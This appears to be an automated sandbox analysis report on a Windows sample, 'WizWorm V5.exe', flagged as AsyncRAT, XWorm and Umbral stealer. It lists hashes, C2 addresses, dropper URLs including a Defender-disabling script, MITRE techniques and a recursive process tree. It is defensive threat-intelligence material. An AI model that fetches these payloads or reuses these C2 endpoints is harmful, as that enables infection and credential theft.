asyncrat | fc2c1679e7d3b6abb01b8c38dec3f16d56d173940a06181244330aa0bc30ab4c

Analysis

max time kernel
17s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
25-07-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizWorm V5/WizWorm V5.exe
Size

21.3MB
MD5

c831f8de57e6bc935d531d95999b7364
SHA1

a85f7c7946e458cf1ba64a233b3932cc314c9cad
SHA256

e1559165017c04cebc3d56bbb9cc7f5b7b18e520f2eec6f77484496e204a92ca
SHA512

1429f4700398b62d70dd51233d95b79aebc0e5a04aa31fea7304cee7b3f7723cd4f8d451945b088615f0f3f77777dfc3e4b8615ce51c42c247a9f392fe46749d
SSDEEP

393216:uSrV5LLmx9KZlGlDAzkG7N2mZ8GeVnBmdRqBXsXG6kik5l1aGEWvPBqeh3:B5R5zkG7/OGe6dReXN6CuGpv

Score

10^/10

asyncrat umbral xworm default credential_access discovery execution rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/eq44/d/raw/main/wzcstatus.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Version

3.1

true-baghdad.gl.at.ply.gg:61202

Mutex

Z0m98pC7RpsdD0uc

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

WeedRAT

Botnet

Default

true-baghdad.gl.at.ply.gg:61202

Mutex

xInKFBCkbzDz

Attributes

delay
3
install
true
install_file
wzcdetect.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Umbral payload 8 IoCs

resource	yara_rule
behavioral4/files/0x000300000002ab66-72.dat	family_umbral
behavioral4/memory/3012-80-0x00000176CAA70000-0x00000176CAAB0000-memory.dmp	family_umbral
behavioral4/memory/1368-1019-0x0000019157690000-0x00000191576D0000-memory.dmp	family_umbral
behavioral4/memory/3304-1173-0x0000024A668E0000-0x0000024A66920000-memory.dmp	family_umbral
behavioral4/memory/5616-1306-0x000001B52A350000-0x000001B52A390000-memory.dmp	family_umbral
behavioral4/memory/5184-1451-0x000002D5BB780000-0x000002D5BB7C0000-memory.dmp	family_umbral
behavioral4/memory/4920-2202-0x0000016F17E00000-0x0000016F17E40000-memory.dmp	family_umbral
behavioral4/memory/5588-2744-0x0000023D8BA90000-0x0000023D8BAD0000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral4/memory/4068-49-0x000001A9B0D40000-0x000001A9B0D4E000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/files/0x000300000002ab65-81.dat	family_asyncrat

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
26	4068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6120	powershell.exe
5936	powershell.exe
5952	powershell.exe
5040	powershell.exe
6076	powershell.exe
6992	powershell.exe
6088	powershell.exe
5176	powershell.exe
7004	powershell.exe
1460	powershell.exe
6952	powershell.exe
224	powershell.exe
4876	powershell.exe
6708	powershell.exe
6708	powershell.exe
5032	powershell.exe
5732	powershell.exe
6496	powershell.exe
6624	powershell.exe
908	powershell.exe
5692	powershell.exe
1968	powershell.exe
6856	powershell.exe
1632	powershell.exe
2468	powershell.exe
4188	powershell.exe
5540	powershell.exe
4612	powershell.exe
3596	powershell.exe
200	powershell.exe
664	powershell.exe
2000	powershell.exe
4192	powershell.exe
3376	powershell.exe
4716	powershell.exe
6048	powershell.exe
3392	powershell.exe
5132	powershell.exe
2040	powershell.exe
6320	powershell.exe
7032	powershell.exe
1468	powershell.exe
5388	powershell.exe
5672	powershell.exe
5060	powershell.exe
5856	powershell.exe
6020	powershell.exe
5164	powershell.exe
1096	powershell.exe
2316	powershell.exe
6888	powershell.exe
2272	powershell.exe
6384	powershell.exe
2956	powershell.exe
5232	powershell.exe
3828	powershell.exe
3828	powershell.exe
1908	powershell.exe
5812	powershell.exe
6004	powershell.exe
6124	powershell.exe
3308	powershell.exe
5152	powershell.exe
5904	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe

Executes dropped EXE 17 IoCs

pid	Process
2916	WizWormV4.exe
4164	WizWormV4.exe
1492	RoboterXRAT V5.exe
1300	WizWormV4.exe
1684	RoboterXRAT V5.exe
1280	RoboterXRAT V5.exe
2768	WeedClient.exe
3012	sihost.exe
644	WizWormV4.exe
1096	RoboterXRAT V5.exe
4296	WeedClient.exe
1156	RoboterXRAT V5.exe
4688	sihost.exe
4916	WizWormV4.exe
3148	RoboterXRAT V5.exe
780	RoboterXRAT V5.exe
4148	WeedClient.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
1	discord.com
16	raw.githubusercontent.com
82	discord.com
16	discord.com
51	discord.com
64	discord.com
71	discord.com
15	discord.com
87	discord.com
27	discord.com
36	raw.githubusercontent.com
45	discord.com
59	discord.com
76	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
15	ip-api.com
16	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4508	cmd.exe
1692	cmd.exe
2444	PING.EXE
2424	cmd.exe
4632	cmd.exe
6388	cmd.exe
6116	cmd.exe
3428	PING.EXE
1848	cmd.exe
1968	PING.EXE
6332	cmd.exe
3692	PING.EXE
4656	cmd.exe
428	PING.EXE
3464	PING.EXE
5192	PING.EXE
4644	PING.EXE
2208	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1900	timeout.exe
1028	timeout.exe

Detects videocard installed 1 TTPs 9 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3828	wmic.exe
6556	wmic.exe
6672	wmic.exe
2020	wmic.exe
4712	wmic.exe
2000	wmic.exe
5092	wmic.exe
7108	wmic.exe
3828	wmic.exe

Runs net.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
5192	PING.EXE
3692	PING.EXE
4644	PING.EXE
2444	PING.EXE
428	PING.EXE
2208	PING.EXE
1968	PING.EXE
3428	PING.EXE
3464	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4132	schtasks.exe
3868	schtasks.exe
4900	schtasks.exe
3596	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4068	powershell.exe
4068	powershell.exe
3012	sihost.exe
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
908	powershell.exe
908	powershell.exe
908	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
2768	WeedClient.exe
5032	powershell.exe
5032	powershell.exe
5032	powershell.exe
1200	powershell.exe
1200	powershell.exe
1200	powershell.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe
4296	WeedClient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	3012	sihost.exe
Token: SeIncreaseQuotaPrivilege	3492	wmic.exe
Token: SeSecurityPrivilege	3492	wmic.exe
Token: SeTakeOwnershipPrivilege	3492	wmic.exe
Token: SeLoadDriverPrivilege	3492	wmic.exe
Token: SeSystemProfilePrivilege	3492	wmic.exe
Token: SeSystemtimePrivilege	3492	wmic.exe
Token: SeProfSingleProcessPrivilege	3492	wmic.exe
Token: SeIncBasePriorityPrivilege	3492	wmic.exe
Token: SeCreatePagefilePrivilege	3492	wmic.exe
Token: SeBackupPrivilege	3492	wmic.exe
Token: SeRestorePrivilege	3492	wmic.exe
Token: SeShutdownPrivilege	3492	wmic.exe
Token: SeDebugPrivilege	3492	wmic.exe
Token: SeSystemEnvironmentPrivilege	3492	wmic.exe
Token: SeRemoteShutdownPrivilege	3492	wmic.exe
Token: SeUndockPrivilege	3492	wmic.exe
Token: SeManageVolumePrivilege	3492	wmic.exe
Token: 33	3492	wmic.exe
Token: 34	3492	wmic.exe
Token: 35	3492	wmic.exe
Token: 36	3492	wmic.exe
Token: SeIncreaseQuotaPrivilege	3492	wmic.exe
Token: SeSecurityPrivilege	3492	wmic.exe
Token: SeTakeOwnershipPrivilege	3492	wmic.exe
Token: SeLoadDriverPrivilege	3492	wmic.exe
Token: SeSystemProfilePrivilege	3492	wmic.exe
Token: SeSystemtimePrivilege	3492	wmic.exe
Token: SeProfSingleProcessPrivilege	3492	wmic.exe
Token: SeIncBasePriorityPrivilege	3492	wmic.exe
Token: SeCreatePagefilePrivilege	3492	wmic.exe
Token: SeBackupPrivilege	3492	wmic.exe
Token: SeRestorePrivilege	3492	wmic.exe
Token: SeShutdownPrivilege	3492	wmic.exe
Token: SeDebugPrivilege	3492	wmic.exe
Token: SeSystemEnvironmentPrivilege	3492	wmic.exe
Token: SeRemoteShutdownPrivilege	3492	wmic.exe
Token: SeUndockPrivilege	3492	wmic.exe
Token: SeManageVolumePrivilege	3492	wmic.exe
Token: 33	3492	wmic.exe
Token: 34	3492	wmic.exe
Token: 35	3492	wmic.exe
Token: 36	3492	wmic.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeIncreaseQuotaPrivilege	2024	wmic.exe
Token: SeSecurityPrivilege	2024	wmic.exe
Token: SeTakeOwnershipPrivilege	2024	wmic.exe
Token: SeLoadDriverPrivilege	2024	wmic.exe
Token: SeSystemProfilePrivilege	2024	wmic.exe
Token: SeSystemtimePrivilege	2024	wmic.exe
Token: SeProfSingleProcessPrivilege	2024	wmic.exe
Token: SeIncBasePriorityPrivilege	2024	wmic.exe
Token: SeCreatePagefilePrivilege	2024	wmic.exe
Token: SeBackupPrivilege	2024	wmic.exe
Token: SeRestorePrivilege	2024	wmic.exe
Token: SeShutdownPrivilege	2024	wmic.exe
Token: SeDebugPrivilege	2024	wmic.exe
Token: SeSystemEnvironmentPrivilege	2024	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 2916	4876	WizWorm V5.exe	82
PID 4876 wrote to memory of 2916	4876	WizWorm V5.exe	82
PID 2916 wrote to memory of 4164	2916	WizWormV4.exe	363
PID 2916 wrote to memory of 4164	2916	WizWormV4.exe	363
PID 2916 wrote to memory of 1612	2916	WizWormV4.exe	86
PID 2916 wrote to memory of 1612	2916	WizWormV4.exe	86
PID 2916 wrote to memory of 1492	2916	WizWormV4.exe	396
PID 2916 wrote to memory of 1492	2916	WizWormV4.exe	396
PID 1612 wrote to memory of 4852	1612	cmd.exe	89
PID 1612 wrote to memory of 4852	1612	cmd.exe	89
PID 4852 wrote to memory of 4928	4852	net.exe	90
PID 4852 wrote to memory of 4928	4852	net.exe	90
PID 1612 wrote to memory of 4068	1612	cmd.exe	91
PID 1612 wrote to memory of 4068	1612	cmd.exe	91
PID 4164 wrote to memory of 1300	4164	WizWormV4.exe	465
PID 4164 wrote to memory of 1300	4164	WizWormV4.exe	465
PID 4164 wrote to memory of 3812	4164	WizWormV4.exe	187
PID 4164 wrote to memory of 3812	4164	WizWormV4.exe	187
PID 4164 wrote to memory of 1684	4164	WizWormV4.exe	164
PID 4164 wrote to memory of 1684	4164	WizWormV4.exe	164
PID 1492 wrote to memory of 1280	1492	RoboterXRAT V5.exe	100
PID 1492 wrote to memory of 1280	1492	RoboterXRAT V5.exe	100
PID 3812 wrote to memory of 2152	3812	cmd.exe	194
PID 3812 wrote to memory of 2152	3812	cmd.exe	194
PID 2152 wrote to memory of 4880	2152	net.exe	477
PID 2152 wrote to memory of 4880	2152	net.exe	477
PID 1492 wrote to memory of 2768	1492	RoboterXRAT V5.exe	484
PID 1492 wrote to memory of 2768	1492	RoboterXRAT V5.exe	484
PID 1492 wrote to memory of 2768	1492	RoboterXRAT V5.exe	484
PID 1492 wrote to memory of 3012	1492	RoboterXRAT V5.exe	104
PID 1492 wrote to memory of 3012	1492	RoboterXRAT V5.exe	104
PID 3012 wrote to memory of 3492	3012	sihost.exe	105
PID 3012 wrote to memory of 3492	3012	sihost.exe	105
PID 3012 wrote to memory of 3708	3012	sihost.exe	107
PID 3012 wrote to memory of 3708	3012	sihost.exe	107
PID 3012 wrote to memory of 4796	3012	sihost.exe	460
PID 3012 wrote to memory of 4796	3012	sihost.exe	460
PID 3812 wrote to memory of 4716	3812	cmd.exe	290
PID 3812 wrote to memory of 4716	3812	cmd.exe	290
PID 3012 wrote to memory of 4612	3012	sihost.exe	112
PID 3012 wrote to memory of 4612	3012	sihost.exe	112
PID 3012 wrote to memory of 908	3012	sihost.exe	619
PID 3012 wrote to memory of 908	3012	sihost.exe	619
PID 1300 wrote to memory of 644	1300	WizWormV4.exe	162
PID 1300 wrote to memory of 644	1300	WizWormV4.exe	162
PID 1300 wrote to memory of 896	1300	WizWormV4.exe	118
PID 1300 wrote to memory of 896	1300	WizWormV4.exe	118
PID 1684 wrote to memory of 1096	1684	RoboterXRAT V5.exe	588
PID 1684 wrote to memory of 1096	1684	RoboterXRAT V5.exe	588
PID 1684 wrote to memory of 4296	1684	RoboterXRAT V5.exe	120
PID 1684 wrote to memory of 4296	1684	RoboterXRAT V5.exe	120
PID 1684 wrote to memory of 4296	1684	RoboterXRAT V5.exe	120
PID 1300 wrote to memory of 1156	1300	WizWormV4.exe	338
PID 1300 wrote to memory of 1156	1300	WizWormV4.exe	338
PID 896 wrote to memory of 4400	896	cmd.exe	380
PID 896 wrote to memory of 4400	896	cmd.exe	380
PID 4400 wrote to memory of 3392	4400	net.exe	455
PID 4400 wrote to memory of 3392	4400	net.exe	455
PID 1684 wrote to memory of 4688	1684	RoboterXRAT V5.exe	124
PID 1684 wrote to memory of 4688	1684	RoboterXRAT V5.exe	124
PID 3012 wrote to memory of 4984	3012	sihost.exe	125
PID 3012 wrote to memory of 4984	3012	sihost.exe	125
PID 896 wrote to memory of 3828	896	cmd.exe	315
PID 896 wrote to memory of 3828	896	cmd.exe	315

Views/modifies file attributes 1 TTPs 11 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5952	attrib.exe
6576	attrib.exe
5656	attrib.exe
3708	attrib.exe
1848	attrib.exe
984	attrib.exe
2076	attrib.exe
2272	attrib.exe
5848	attrib.exe
4072	attrib.exe
2788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe
"C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
  "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
    "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
      "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1300
    - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        5⤵
        Executes dropped EXE
        
        PID:644
      - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        6⤵
        Executes dropped EXE
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        7⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        8⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        9⤵
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        10⤵
        
        PID:5404
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        11⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        12⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        13⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        14⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        15⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        16⤵
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        17⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        18⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        19⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        20⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        21⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        22⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        23⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        24⤵
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        25⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        26⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        27⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        28⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        29⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        30⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        31⤵
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        32⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        33⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        34⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        35⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        36⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        37⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        38⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        39⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        40⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        41⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        42⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        43⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        44⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        45⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        46⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        47⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        48⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        49⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        50⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        51⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        52⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        53⤵
        
        PID:3788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        53⤵
        
        PID:836
        
        C:\Windows\system32\net.exe
        
        net file
        54⤵
        
        PID:4040
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        55⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:1500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        52⤵
        
        PID:5164
        
        C:\Windows\system32\net.exe
        
        net file
        53⤵
        
        PID:6476
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        54⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        53⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        51⤵
        
        PID:6684
        
        C:\Windows\system32\net.exe
        
        net file
        52⤵
        
        PID:5144
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        53⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:5296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:3888
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        Views/modifies file attributes
        
        PID:2272
        
